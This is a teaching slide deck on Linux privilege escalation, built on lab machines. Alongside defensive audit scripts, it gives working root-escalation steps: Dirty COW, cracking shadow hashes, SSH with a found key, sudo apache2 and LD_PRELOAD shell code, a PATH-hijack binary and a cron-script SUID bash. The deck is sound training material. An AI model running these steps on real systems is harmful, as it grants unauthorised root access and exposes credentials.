LINUX PRIVILEGE ESCALATION

NAYLA GREIGE

ABOUT ME

    • Computer engineer with a master's degree in networking
    • Lab instructor and supervisor for the Cybersecurity and Networking Laboratory at the University of Balamand

REMARKS BEFORE STARTING

    • All demos were performed in the TryHackMe room.
    • To set up your own environment, you can install the Mr. Robot vulnerable machine from VulnHub (Mr. Robot: 1).

This machine provides an environment for practicing and learning about vulnerabilities and privilege escalation techniques.

AGENDA

    • Brief overview
    • Enumeration
    • Automated tools
    • Privilege escalation: kernel exploits
    • Privilege escalation: passwords & file permissions
    • Privilege escalation: sudo
    • Privilege escalation: SUID
    • Privilege escalation: cron jobs
    • Countermeasures

BRIEF OVERVIEW

DEFINITION

Privilege escalation refers to gaining elevated access on a Linux system beyond what a user is typically authorized to do.

Consequences:

    • Delete files
    • View sensitive information
    • Install unwanted programs
    • Change system settings

TYPES OF PRIVILEGE ESCALATION

    • Vertical privilege escalation: moving from a lower privilege (normal user) to a higher privilege (root/administrator). Grants full control over the system.
    • Horizontal privilege escalation: moving to another user's privileges without root access, i.e. accessing files or executing actions as another user at the same privilege level.

TECHNIQUES

A multitude of privilege escalation techniques are available:

    • Kernel exploits
    • Password hunting
    • File permissions
    • Sudo attacks
    • Shell escaping
    • LD_PRELOAD
    • SUID attacks
    • Environment variables
    • Capabilities attacks
    • Scheduled tasks
    • NFS
    • Docker

ENUMERATION

DEFINITION

Enumeration refers to the process of gathering detailed information about a target system once it has been discovered to be alive and accessible (e.g., during the scanning phase).

It is like digging deeper into the target machine in order to collect more information about it.

Enumeration is split into four areas: system, network, user and password enumeration.

SYSTEM ENUMERATION

    • uname -a: displays the kernel version and system architecture.
    • lscpu: provides details about the CPU, such as cores and threads.
    • ps aux: lists all running processes and the user each runs as, similar to Task Manager in Windows.
    • hostname: returns the hostname of the target machine.
    • cat /proc/version: displays the Linux kernel version and the system's build details, including the compiler used to build it (useful when you need to compile an exploit on the box).
    • cat /etc/issue: shows the system identification (such as the Linux distribution and version) that appears before the login prompt. It can be customised by the administrator; /etc/os-release is the authoritative source for the distribution and version.

LINUX COMMANDS DEMO

USER ENUMERATION

    • whoami: displays the current user.
    • id: shows our user ID (uid), primary group ID (gid) and supplementary groups.
    • sudo -l: lists the commands the current user may run through sudo, and as which users (not necessarily only root).
    • cat /etc/passwd: lists all accounts on the system (world-readable by design).
    • cat /etc/shadow: shows the hashed passwords and password-ageing details for accounts; normally readable only by root.
    • cat /etc/group: defines the groups to which users belong.
    • history: shows previously executed commands, which may contain sensitive information such as passwords typed on the command line.

PASSWD FILE

username:placeholder:uid:gid:text description:home directory:shell

The placeholder is normally "x", meaning the real hash lives in /etc/shadow. A hash present in this field of a world-readable file, or an empty field, is a finding in itself.

To list only the usernames:

cut -d: -f1 /etc/passwd

SHADOW FILE

username:password hash:last change:min age:max age:warning period:inactivity period:expiration date:reserved

Only readable by root (or by the shadow group on some distributions) for security reasons:

-rw------- 1 root root 1.2K Jan 30 10:00 /etc/shadow

GROUP FILE

groupname:group password:gid:users in the group

NETWORK ENUMERATION

    • ifconfig (or ip a on modern systems): displays IP addresses and network interfaces.
    • netstat (or ss): shows sockets, active connections and listening ports.
      • netstat -a: shows all sockets, both listening and established connections.
      • netstat -at or netstat -au: restricts the list to TCP or UDP respectively.
      • netstat -l: lists only ports in "listening" mode; these are open and ready to accept incoming connections. Add -n to skip name resolution and -p to see the owning process.
    • arp -a (or ip neigh): lists devices recently seen on the local network.
    • ip route: shows which network routes exist.

NETWORK ENUMERATION

    • nmap: scans hosts and the services listening on their ports.
      • nmap -sn <range>: host discovery (ping scan) to see which devices are online, without port scanning.
      • nmap -p <ports> <host>: scans the given ports on a specific machine.
    • netdiscover -r <range>: quickly discovers live devices on the local network via ARP.

PASSWORD ENUMERATION

When searching for sensitive files like SSH keys or passwords, it is important to use effective methods to locate them efficiently.

Commands like grep, locate and find are useful to search for specific terms, such as "password", or for SSH-related files.

PASSWORD ENUMERATION

grep -rnwi --color=always -e "password" / 2>/dev/null

Searches for the word "password" (case-insensitive) in every file on the system, printing file name and line number and highlighting the matches in red so they are easy to spot. Searching / is slow and noisy; /etc, /home, /var/www and /opt are the usual places to start.

grep -rniE --color=always -e "password[[:space:]]*=" / 2>/dev/null

Narrows the results down to password assignments. Note that -w is dropped here: with -w, "password=secret" would not match, because "=" must be followed by a non-word character for the whole-word test to pass.

locate password | more

Locates files whose name contains "password" (locate reads the updatedb database, which may be stale or absent on a target).
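An added example (not from the slides) showing why the -w flag in the first grep misses the most useful hits. It builds a few constructed sample files in a temporary directory, runs the deck's whole-word search and an assignment-focused search over them, and returns the hit counts.

```sh
#!/bin/sh
# Added example: compares grep -w against an assignment-aware pattern on
# constructed sample files. Nothing here touches real system files.

# Create a temp dir with constructed files and print its path.
make_samples() {
    d=$(mktemp -d)
    printf 'DB_PASSWORD=supersecret\n'               > "$d/app.env"
    printf 'password = hunter2\n'                    > "$d/config.ini"
    printf 'the password policy requires 12 chars\n' > "$d/notes.txt"
    printf 'passwords_rotated=true\n'                > "$d/flags.conf"
    echo "$d"
}

# The deck's approach: -w demands a whole word. "PASSWORD=" then only
# matches when the character before it and the one after '=' are non-word
# characters, which rules out DB_PASSWORD=... (preceded by '_') and
# "password = hunter2" (spaces around '=').
count_word_match() {
    grep -rnwi -e 'PASSWORD=' "$1" 2>/dev/null | wc -l | tr -d ' '
}

# Assignment-aware pattern: optional spaces around '=', a non-empty value,
# and no -w, so prefixes like DB_ still match while prose does not.
count_assignments() {
    grep -rniE -e 'passw(or)?d[[:space:]]*=[[:space:]]*[^[:space:]]' "$1" 2>/dev/null |
        wc -l | tr -d ' '
}

# Stand-alone run: prints "word-match hits: 0" and "assignment hits: 2".
demo() {
    d=$(make_samples)
    echo "word-match hits: $(count_word_match "$d")"
    echo "assignment hits: $(count_assignments "$d")"
    rm -rf "$d"
}
demo
```

On a real target, point the two functions at /etc, /home or a web root rather than at a temporary directory; the pattern is the same.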

USER ENUMERATION: SUID

The SUID bit makes a file run with the privilege level of the account that owns it, rather than the account which runs it.

To find files with the SUID bit set (which, when root owns them, let us run the file with a higher privilege level than the current user):

find / -perm -u=s -type f 2>/dev/null

Use ls -l to view file or directory permissions.

USER ENUMERATION: SUID AND SGID

    • SUID: represented by replacing the owner's execute bit (x) with (s). => Allows executing the file as the file owner.
    • SGID (set group ID): similar to SUID but applies to the group; represented by replacing the group's execute bit (x) with (s). => Allows executing the file with the group's permissions (on a directory it makes new files inherit the directory's group instead).

A capital "S" in either position means the bit is set but the execute bit is not, so the file cannot actually be run that way.

USER ENUMERATION: PERMISSION STRINGS

-rwxr-xr--    file permissions (leading "-" = regular file)
drwxr-xr--    directory permissions (leading "d" = directory)

              Owner   Group   Others
  Normal      rwx     r-x     r--
  SUID        rws     r-x     r--
  SGID        rwx     r-s     r--

USER ENUMERATION

find / -perm -o=x -type d 2>/dev/null

Find world-executable folders.

find / -perm -o=w -type d 2>/dev/null

Find world-writable folders (a trailing "t" in ls -l, as on /tmp, means the sticky bit is set and only a file's owner may delete or rename it there).

find / -perm -u=s -type f 2>/dev/null

Find files with the SUID bit, which allow us to run the file with a higher privilege level than the current user.
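An added example (not from the slides) that turns the find one-liners into a reusable check: it lists SUID files under a directory, reports the ones missing from a saved baseline (a new or renamed SUID binary is a far stronger lead than the dozens of stock ones), and lists world-writable directories while skipping those protected by the sticky bit. The baseline and the sample tree are constructed for the demo.

```sh
#!/bin/sh
# Added example: SUID inventory vs. a baseline, plus world-writable dirs
# without the sticky bit. Works on any root dir, so it can run on a temp tree.

# SUID regular files under $1, one per line, sorted; -xdev stays on one filesystem.
list_suid() {
    find "$1" -xdev -type f -perm -u=s 2>/dev/null | sort
}

# SUID files under $1 that are NOT listed in the baseline text $2
# (one absolute path per line). These are the ones to investigate first.
unexpected_suid() {
    bl=$(mktemp)
    printf '%s\n' "$2" > "$bl"
    list_suid "$1" | grep -vxF -f "$bl"
    rm -f "$bl"
}

# World-writable directories under $1 that lack the sticky bit: anyone can
# delete or replace files there, unlike /tmp-style 1777 directories.
world_writable_dirs() {
    find "$1" -xdev -type d -perm -o=w ! -perm -1000 2>/dev/null | sort
}

# Constructed lab tree for a stand-alone run; prints its path.
make_lab() {
    lab=$(mktemp -d)
    mkdir "$lab/ww" "$lab/sticky"
    chmod 777 "$lab/ww"
    chmod 1777 "$lab/sticky"
    : > "$lab/known"; chmod 4755 "$lab/known"   # listed in the baseline
    : > "$lab/evil";  chmod 4755 "$lab/evil"    # not in the baseline
    echo "$lab"
}

demo() {
    lab=$(make_lab)
    echo "unexpected SUID:"; unexpected_suid "$lab" "$lab/known"
    echo "world-writable, no sticky bit:"; world_writable_dirs "$lab"
    rm -rf "$lab"
}
demo
```

On a live system the baseline is the output of list_suid taken from a freshly installed machine of the same distribution and release.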

AUTOMATED TOOLS

AUTOMATED TOOLS

    • Tools enhance search capabilities, finding vulnerabilities and misconfigurations faster and more consistently than manual methods.
    • The target system's environment will influence which tool you will be able to use. For example, you will not be able to run a tool written in Python if Python is not installed on the target system.
    • This is why it is better to be familiar with a few tools rather than having a single go-to tool.

AUTOMATED TOOLS

    • LinPEAS: a powerful Linux privilege escalation script.
      • Colour-coded output, hunts for vulnerabilities and gathers extensive system information.
      • Easy to run (a single .sh file, no dependencies).
    • LinEnum.sh: similar to LinPEAS, enumerates system details.
    • Linux Exploit Suggester: suggests potential kernel exploits based on the kernel version and other system readings.
    • linuxprivchecker.py: Python-based checker, useful when Python is available on the target and the shell scripts fail.

AUTOMATED TOOLS

Key findings include:

    • Kernel exploits (via version information).
    • Sudo info, system info and PATH details.
    • Misconfigurations in cron jobs or network settings.
    • Writable files or potential passwords.
    • High-risk indicators: RED (likely exploitable issues) and YELLOW (possible issues) highlight the areas to check first. Treat them as leads to verify by hand, not as confirmed vulnerabilities.

PRIVILEGE ESCALATION: KERNEL EXPLOITS

KERNEL EXPLOITS

    • Definition: the kernel is the core component of an operating system (like Linux), acting as a bridge between the hardware and software.
    • Functions:
      - Managing hardware: controls memory, CPU and storage devices.
      - Running programs: allocates resources and schedules execution.
      - Security and permissions: enforces access control. A bug here is a bug in the component every other control relies on, which is why a kernel exploit yields root directly.

KERNEL EXPLOITS

The kernel sits between applications and hardware (memory, CPU, devices).

It is like the "manager" of the system, ensuring everything runs smoothly and securely.

[Diagram: Applications -> Kernel -> CPU / Memory / Devices]

KERNEL EXPLOITS

The simple exploit process:

1. Find the kernel version: use uname -a (or cat /proc/version) to check the kernel version and the distribution.

2. Search for exploits: look for exploits that work with that version of the kernel (using Google, GitHub, Exploit-DB or the offline searchsploit tool).

3. Run the exploit: once you find the exploit, download, compile and run the exploit code to escalate privileges.

Caveat: kernel exploits are the least stable technique. They can crash or corrupt the target, they often need a matching compiler on the box, and distribution backports mean the version string alone does not prove the kernel is vulnerable. Try them last, and on an engagement only with the client's agreement.

PRACTICAL EXAMPLE: DIRTY COW

What is Dirty COW?

    • Dirty COW (CVE-2016-5195) is a race condition in the copy-on-write handling of the Linux memory subsystem, present in kernels from 2.6.22 (2007) until it was fixed in October 2016 (4.8.3 and the corresponding stable branches).
    • It allows a local attacker to write to read-only file mappings, so a protected file such as a root-owned SUID binary can be overwritten and privileges escalated.

KERNEL EXPLOITS: DIRTY COW WALKTHROUGH

1. Check for potential exploits based on the system's configuration, using the exploit suggester:

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

or manually check the kernel version and search for an exploit afterwards:

uname -a

2. Download and compile the c0w exploit (it needs pthread):

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

3. Run it. This variant overwrites the SUID binary /usr/bin/passwd with a payload that spawns a shell:

./c0w

4. Execute the overwritten binary to get the root shell:

passwd

5. Confirm the privileges:

id

Note: c0w replaces the real passwd binary, so restore it from a backup afterwards on a lab box, and never run this against a production host.

PRIVILEGE ESCALATION: PASSWORDS & FILE PERMISSIONS

This section covers three paths:

    • Privilege escalation via stored passwords
    • Privilege escalation via weak file permissions
    • Privilege escalation via SSH keys

PRIVILEGE ESCALATION VIA STORED PASSWORDS

Methods to find stored passwords:

    • history: check the shell history for passwords or sensitive commands. ~/.bash_history exists on most Linux machines, and other users' history files are worth reading if they are readable.
    • grep -rnwi --color=always -e "password" / 2>/dev/null: search for the word "password" in files across the system.
    • LinPEAS: automated tool to quickly scan for passwords.

PRIVILEGE ESCALATION VIA STORED PASSWORDS

Practical example, using history:

    • In the command prompt type:

grep -i passw ~/.bash_history

Password found in history:

su root with password password123.

PRIVILEGE ESCALATION VIA STORED PASSWORDS

Practical example, using config files such as OpenVPN:

    • Assuming that our vulnerable machine has OpenVPN installed, in the command prompt type:

cat /home/user/myvpn.ovpn

The auth-user-pass directive in the profile points to a credentials file; read it:

cat /etc/openvpn/auth.txt

    • We can see that credentials are exposed in the OpenVPN auth file.

PRIVILEGE ESCALATION VIA WEAK FILE PERMISSIONS

    • Weak file permissions: a user can read or modify files that they should not be able to.
    • Examples:
      • /etc/passwd is readable by all users by design, but if it is writable you can add a uid 0 account or put a password hash directly in the second field.
      • /etc/shadow should be restricted to root only. If it is readable, the hashes can be cracked offline; if it is writable, root's hash can be replaced with one you know.

PRIVILEGE ESCALATION VIA WEAK FILE PERMISSIONS

Practical example: /etc/shadow readable by anyone

    • Check first with ls -l /etc/shadow. If it is readable, in the command prompt type the following and copy the results to files on your attacker machine:

cat /etc/passwd > passwd.txt

cat /etc/shadow > shadow.txt

    • On your attacker machine type:

unshadow passwd.txt shadow.txt > unshadowed.txt

Use a wordlist to crack the hashes. unshadow produces john's input format; hashcat wants only the bare hash per line, so extract the second field first. -m 1800 is sha512crypt, the "$6$" hashes, so check the prefix before choosing the mode:

cut -d: -f2 unshadowed.txt > hashes.txt

hashcat -m 1800 hashes.txt rockyou.txt -O
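Before launching hashcat, confirm that -m 1800 matches the hashes: the mode is tied to the crypt prefix, and current Debian and Ubuntu releases default to yescrypt ($y$), which hashcat does not support, so john is the tool there. This is an added example, not from the slides; the shadow entries it runs on are constructed.

```sh
#!/bin/sh
# Added example: map a shadow entry's hash prefix to the hashcat mode, or
# flag it as locked / unsupported. Entries below are constructed, not real.

# Print the hashcat mode for one shadow line (user:hash:...), or a reason.
hash_mode() {
    hash=$(printf '%s\n' "$1" | cut -d: -f2)
    case "$hash" in
        '$1$'*)          echo 500 ;;          # md5crypt
        '$5$'*)          echo 7400 ;;         # sha256crypt
        '$6$'*)          echo 1800 ;;         # sha512crypt (the deck's case)
        '$2'[aby]'$'*)   echo 3200 ;;         # bcrypt
        '$y$'*|'$7$'*)   echo unsupported ;;  # yescrypt/scrypt: use john
        ''|'*'|'!'*)     echo locked ;;       # no password / account locked
        *)               echo unknown ;;
    esac
}

# Write the $6$ hashes of shadow file $1 to $2, one per line, in the bare
# form hashcat -m 1800 expects (no username, no ageing fields). Prints count.
extract_sha512_hashes() {
    cut -d: -f2 "$1" | grep '^\$6\$' > "$2"
    wc -l < "$2" | tr -d ' '
}

# Stand-alone run on a constructed shadow file.
demo() {
    f=$(mktemp); out=$(mktemp)
    cat > "$f" <<'EOF'
root:$6$abc$constructedhashvalue:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$y$j9T$salt$constructedhashvalue:19000:0:99999:7:::
bob:!:19000:0:99999:7:::
EOF
    while IFS= read -r line; do
        printf '%-8s %s\n' "${line%%:*}" "$(hash_mode "$line")"
    done < "$f"
    n=$(extract_sha512_hashes "$f" "$out")
    echo "$n sha512crypt hash(es) written to $out"
    rm -f "$f" "$out"
}
demo
```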


PRIVILEGE ESCALATION VIA SSH KEYS

SSH keys are a safe way to access remote systems without needing a password.

They work using two keys:

    • A private key (id_rsa) kept on your local machine.
    • A public key saved on the remote machine in a file called authorized_keys.

When you try to log in, the server sends a challenge that only the holder of the matching private key can sign; a valid signature grants access.

This method is more secure than passwords because it relies on unique keys for verification, but it is only as safe as the private key file: anyone who can read it can log in as that account.

PRIVILEGE ESCALATION VIA SSH KEYS

In the command prompt type:

find / -name authorized_keys 2>/dev/null

Nothing returned.

find / -name id_rsa 2>/dev/null

A backup copy of a private key (id_rsa, in a "super secret keys" backup directory) is found.

Copy the contents of the discovered id_rsa file to a file on your attacker VM, then on your attacker machine type:

chmod 400 id_rsa

ssh -i id_rsa root@<victim_ip>

The chmod comes first: ssh refuses to use a private key that is readable by other users. Instead of using a password we are using a private key. If the key is protected by a passphrase, ssh2john and john can be used to attack the passphrase.

PRIVILEGE ESCALATION: SUDO

This section covers three sudo paths:

    • Privilege escalation via sudo (shell escaping)
    • Privilege escalation via sudo (abusing intended functionality)
    • Privilege escalation via sudo (LD_PRELOAD)

PRIVILEGE ESCALATION VIA SUDO (SHELL ESCAPING)

    • sudo: a command that lets users execute programs as another user, root by default. Users or groups can therefore be given the ability to run certain commands as root in /etc/sudoers.
    • Command to check privileges: sudo -l lists the commands the current user can run through sudo and as which user, together with the relevant Defaults entries (such as env_keep).
    • Privilege escalation can be achieved by exploiting misconfigured sudoers settings: a permitted binary that can spawn a shell, read or write arbitrary files, or an environment setting that lets us inject code.

PRIVILEGE ESCALATION VIA SUDO (SHELL ESCAPING)

In the command prompt type the command below to list the binaries you can run as root:

sudo -l

Choose one of the listed binaries and search for it on GTFOBins (https://gtfobins.github.io).

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions, grouped by function (shell, file read, file write, sudo, SUID, ...).

If the binary is listed with "Sudo" as a function, you can use it to elevate privileges, usually via an escape sequence that spawns a shell from inside the program.

PRIVILEGE ESCALATION VIA SUDO (SHELL ESCAPING)

Search for the commands to get root privileges with the help of GTFOBins.

Let's suppose the find binary is available in sudo -l. The GTFOBins entry uses find's -exec action to launch /bin/sh, which therefore runs as root. Copy and paste the command into your victim machine and you will gain access to a root shell; confirm it with id.

PRIVILEGE ESCALATION VIA SUDO (ABUSING INTENDED FUNCTIONALITY)

Some applications, like apache2, have no shell escape. However, an attacker can still use their legitimate features indirectly.

For example, apache2 has an option (-f) that makes it load a different configuration file.

If you point it at /etc/shadow (which contains the password hashes), apache2 fails to parse the file and prints the offending line in its error message. The first line of /etc/shadow is the root account's entry, so the error reveals root's password hash.

PRIVILEGE ESCALATION VIA SUDO (ABUSING INTENDED FUNCTIONALITY)

On the victim machine, given that apache2 is available in sudo -l, type:

sudo apache2 -f /etc/shadow

From the output ("Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$...'"), copy the root hash.

On the attacker machine:

echo '[Pasted Root Hash]' > hash.txt

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Keep the single quotes around the hash: it contains "$" characters that the shell would otherwise expand.

PRIVILEGE ESCALATION VIA SUDO (LD_PRELOAD)

LD_PRELOAD is an environment variable that tells the dynamic loader to load a user-specified shared library into a program before any other library.

Normally sudo resets the environment (env_reset) and the loader ignores LD_PRELOAD for privileged binaries. If sudoers keeps the variable ("env_keep += LD_PRELOAD", visible in the Defaults section of sudo -l), we can build a shared library whose initialisation code runs as root before the permitted program starts, whichever program that is.

PRIVILEGE ESCALATION VIA SUDO (LD_PRELOAD)

Open a text editor and type:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs when the library is loaded, before the target program's main().
   _init is used because the library is built with -nostartfiles. */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell does not reload us */
    setgid(0);
    setuid(0);                /* we already run as root under sudo */
    system("/bin/bash");
}

This sets the group ID and user ID to 0, which gives us privileges as the root user.

Save the file as x.c, compile it, then execute it through any binary you are allowed to sudo (apache2 here):

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

sudo LD_PRELOAD=/tmp/x.so apache2

id
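The two sudo checks above, a GTFOBins-listed binary among the allowed commands (shell escaping) and LD_PRELOAD surviving through env_keep, can both be read straight from sudo -l output. An added example, not from the slides, that triages a saved copy of that output; the transcript it parses is constructed to resemble the room, and the GTFOBins name list is a small hand-picked subset, so check the site for the current entries.

```sh
#!/bin/sh
# Added example: triage `sudo -l` output for (1) env_keep passing LD_PRELOAD
# through sudo and (2) allowed binaries with a known GTFOBins "Sudo" escape.
# The transcript below is constructed, not captured from a real host.

SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/man'

# Names with a "Sudo" section on GTFOBins (assumption: illustrative subset).
GTFO_SUDO='find vim nano less more man awk env python perl apache2'

# Succeeds if LD_PRELOAD is kept across sudo's env_reset.
ld_preload_kept() {
    printf '%s\n' "$1" | grep -Eq 'env_keep[[:space:]]*\+?=.*LD_PRELOAD'
}

# Print the allowed command paths from sudo -l output, one per line:
# strip the "(runas) TAG:" prefix, split comma-separated lists, trim.
allowed_commands() {
    printf '%s\n' "$1" |
        grep -E '^[[:space:]]*\(' |
        sed -E 's/^[[:space:]]*\([^)]*\)([[:space:]]*[A-Z_]+:)*[[:space:]]*//' |
        tr ',' '\n' |
        sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' |
        grep -v '^$'
}

# Print allowed commands whose basename is on the GTFOBins subset.
escapable_sudo_bins() {
    allowed_commands "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        for g in $GTFO_SUDO; do
            if [ "$g" = "$name" ]; then echo "$path"; fi
        done
    done
}

demo() {
    if ld_preload_kept "$SAMPLE_SUDO_L"; then
        echo "LD_PRELOAD is kept by sudo: any allowed binary can load a root shell"
    fi
    echo "GTFOBins sudo escapes:"
    escapable_sudo_bins "$SAMPLE_SUDO_L"
}
demo
```

Feed a real transcript with `sudo -l > sudo_l.txt` and pass its contents to the two functions; an "ALL" entry in the allowed commands is not caught by the name match and is a finding on its own.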


PRIVILEGE ESCALATION: SUID

PRIVILEGE ESCALATION: SUID

SUID (set user ID) files run with the permissions of their owner, often the root user. They can potentially be used for attacks because they run with elevated privileges regardless of who starts them.

In this section we will be using the binary /usr/local/bin/suid-env.

It includes calls to setresuid and setresgid, which change the user and group IDs; here they keep root privileges while the program starts a service.

suid-env then calls the "service" program by name instead of by absolute path, so it inherits the caller's PATH and can be exploited if an attacker puts a directory containing a malicious "service" first in PATH.

PRIVILEGE ESCALATION: SUID

In the command prompt type:

find / -type f -perm -04000 -ls 2>/dev/null

strings /usr/local/bin/suid-env

This displays the human-readable strings embedded within the binary file; "service apache2 start" with no leading path is the tell.

In the command prompt type:

    • printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
    • gcc /tmp/service.c -o /tmp/service
    • export PATH=/tmp:$PATH
    • /usr/local/bin/suid-env
    • id

The includes are needed because current gcc versions reject implicit declarations of setgid, setuid and system.
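What makes suid-env exploitable is a single relative command name; the fix is to pin PATH and call the helper by absolute path. An added example (not from the slides) that reproduces both behaviours without root or a SUID binary: it builds a constructed "trusted" directory with a benign service stub and a writable directory with an attacker's stub of the same name, then runs a vulnerable and a hardened launcher against them.

```sh
#!/bin/sh
# Added example: PATH hijack of a relative command name, as in suid-env, and
# the hardened form. All binaries are constructed stubs in a temp dir.

# Build the lab: trusted/service (legit stub) and tmp/service (attacker stub).
make_lab() {
    lab=$(mktemp -d)
    mkdir "$lab/trusted" "$lab/tmp"
    printf '#!/bin/sh\necho real-service-ran\n' > "$lab/trusted/service"
    printf '#!/bin/sh\necho HIJACKED\n'         > "$lab/tmp/service"
    chmod 755 "$lab/trusted/service" "$lab/tmp/service"
    echo "$lab"
}

# Vulnerable launcher: "service" is resolved through whatever PATH the caller
# hands us, which is exactly what a SUID root program must never do.
run_service_vuln() {
    service apache2 start
}

# Hardened launcher ($1 = trusted bin dir): reset PATH to known directories and
# execute the helper by absolute path. Runs in a subshell so the caller's PATH
# is untouched.
run_service_hardened() (
    PATH="$1:/usr/sbin:/usr/bin:/sbin:/bin"
    export PATH
    "$1/service" apache2 start
)

# Stand-alone run, in a subshell so the PATH change does not leak.
demo() (
    lab=$(make_lab)
    PATH="$lab/tmp:$PATH"; export PATH     # what the attacker does before running suid-env
    echo "vulnerable: $(run_service_vuln)"
    echo "hardened:   $(run_service_hardened "$lab/trusted")"
    rm -rf "$lab"
)
demo
```

The same two rules apply to the C source of a SUID program: clear or set PATH (and the other loader-relevant variables) before calling system() or exec, and never rely on the caller's environment.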


PRIVILEGE ESCALATION: CRON JOBS

PRIVILEGE ESCALATION: CRON JOBS

Cron jobs are scheduled tasks on a Linux system. They run automatically at specific times (e.g., backups or cleaning temporary files).

Jobs in /etc/crontab and /etc/cron.d specify the user they run as, which is often root (the most privileged user on a system).

Cron jobs are vulnerable if the scripts they run are not properly protected: a world-writable script, a script in a directory we can write to, or a command without an absolute path that depends on cron's PATH.

Example: if there is a script that runs every minute as root and you can modify that script, you can make it run arbitrary commands as root.

PRIVILEGE ESCALATION: CRON JOBS

In the command prompt type:

cat /etc/crontab

This gives you insight into what tasks are being run, when, and as which user.

ls -l /usr/local/bin/overwrite.sh

The script only echoes the date into /tmp/useless, but it is world-writable, so we can append to it:

    • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
    • wait a minute for the job to run (a root-owned SUID copy of bash should now exist in /tmp)
    • /tmp/bash -p

The -p flag tells bash to keep the effective uid (root) instead of dropping to the real uid. We can see that we were able to overwrite the script and obtain a root shell.
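To find this kind of job without reading every crontab by eye, check each scheduled command for a target that non-root users can write to. An added example (not from the slides) that parses a constructed system crontab and two constructed scripts in a temporary directory, one of them world-writable like overwrite.sh, and reports only the writable target.

```sh
#!/bin/sh
# Added example: audit system-crontab entries (m h dom mon dow user command)
# for targets that are world-writable. Crontab and scripts are constructed.

# Print "user target" for each line of system crontab $1 whose first command
# word is an existing, world-writable file. A root job running such a script
# is a root shell away.
writable_cron_targets() {
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |
    while read -r min hour dom mon dow user cmd; do
        target=${cmd%% *}                 # first word = the program or script
        if [ -f "$target" ] && \
           [ -n "$(find "$target" -maxdepth 0 -perm -o=w 2>/dev/null)" ]; then
            echo "$user $target"
        fi
    done
}

# Constructed lab: a world-writable script (the flaw), a sane one, and a crontab.
make_cron_lab() {
    lab=$(mktemp -d)
    printf '#!/bin/bash\necho $(date) > /tmp/useless\n' > "$lab/overwrite.sh"
    printf '#!/bin/bash\n/usr/bin/true\n'               > "$lab/compress.sh"
    chmod 777 "$lab/overwrite.sh"
    chmod 755 "$lab/compress.sh"
    cat > "$lab/crontab" <<EOF
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
* * * * * root $lab/overwrite.sh
* * * * * root $lab/compress.sh
EOF
    echo "$lab"
}

demo() {
    lab=$(make_cron_lab)
    echo "root jobs with world-writable targets:"
    writable_cron_targets "$lab/crontab"
    rm -rf "$lab"
}
demo
```

Run it against /etc/crontab and the files in /etc/cron.d on a target; per-user crontabs have no user field, so drop that column when adapting the read.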


COUNTERMEASURES

PROTECTION TIPS

    • Apply least privilege: give users only the necessary permissions to reduce escalation risks. Keep sudo rules to specific commands, avoid binaries with shell escapes, and do not add LD_PRELOAD or other loader variables to env_keep.
    • Patch and update systems: regularly update the kernel and software to fix vulnerabilities such as Dirty COW.
    • Audit and log access: monitor privileged access and set alerts for suspicious activity to detect attacks early. Periodically review SUID binaries, cron scripts and their permissions.
    • Use password managers or privileged access management (PAM) tooling: keep secrets out of scripts, configuration files, logs and shell history, and keep /etc/shadow and private keys readable only by their owner.

MR ROBOT DEMO

RESOURCES

GUIDES/WALKTHROUGHS

EXPLOIT DATABASES AND TOOLS

CTF/PRACTICE PLATFORMS

GITHUB REPOSITORIES

VIDEOS

BLOGS AND WRITE-UPS

THANK YOU

NAYLA GREIGE